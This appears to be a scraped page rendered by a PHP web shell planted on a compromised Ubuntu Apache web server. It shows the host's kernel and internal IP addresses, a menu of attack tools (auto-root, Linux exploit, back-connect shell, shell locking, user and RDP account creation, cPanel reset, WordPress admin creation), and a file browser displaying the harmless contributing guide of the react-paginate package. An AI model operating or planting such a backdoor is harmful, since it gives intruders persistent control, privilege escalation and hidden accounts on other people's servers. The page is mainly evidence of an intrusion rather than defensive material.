Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
react-paginate /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
drwxrwxr-x
react_components
[ DIR ]
drwxrwxr-x
CHANGELOG.md
8.88
KB
-rw-rw-r--
CONTRIBUTE.md
923
B
-rw-rw-r--
LICENSE
1.06
KB
-rw-rw-r--
README.md
12.24
KB
-rw-rw-r--
index.d.ts
5.8
KB
-rw-rw-r--
package.json
1.72
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CONTRIBUTE.md
# Contributing ## Getting started 1. [Submit an issue](https://github.com/AdeleD/react-paginate/issues) 2. Fork the repository 3. Create a dedicated branch (never ever work in `master`) 4. Run `npm start` http://localhost:3000 5. Fix bugs or implement features 6. Always write tests 7. Format with Prettier `npm run format` and check ESLint `npm run lint` 8. Document your changes in [`CHANGELOG.md`](/CHANGELOG.md) 9. If props have changed, update the TypeScript definitions in [`dist/index.d.ts`](/dist/index.d.ts) 10. Submit the PR Run tests: ```console npm test ``` ## Releasing 1. Build the code to be released `npm run build` 2. Check the [`CHANGELOG.md`](/CHANGELOG.md) is complete 3. Update the version in [`package.json`](/package.json) 4. Tag the new version `git tag v8.0.0` and push the tag `git push --tags` 5. Create a [release note](https://github.com/AdeleD/react-paginate/releases) 6. Publish on NPM
Close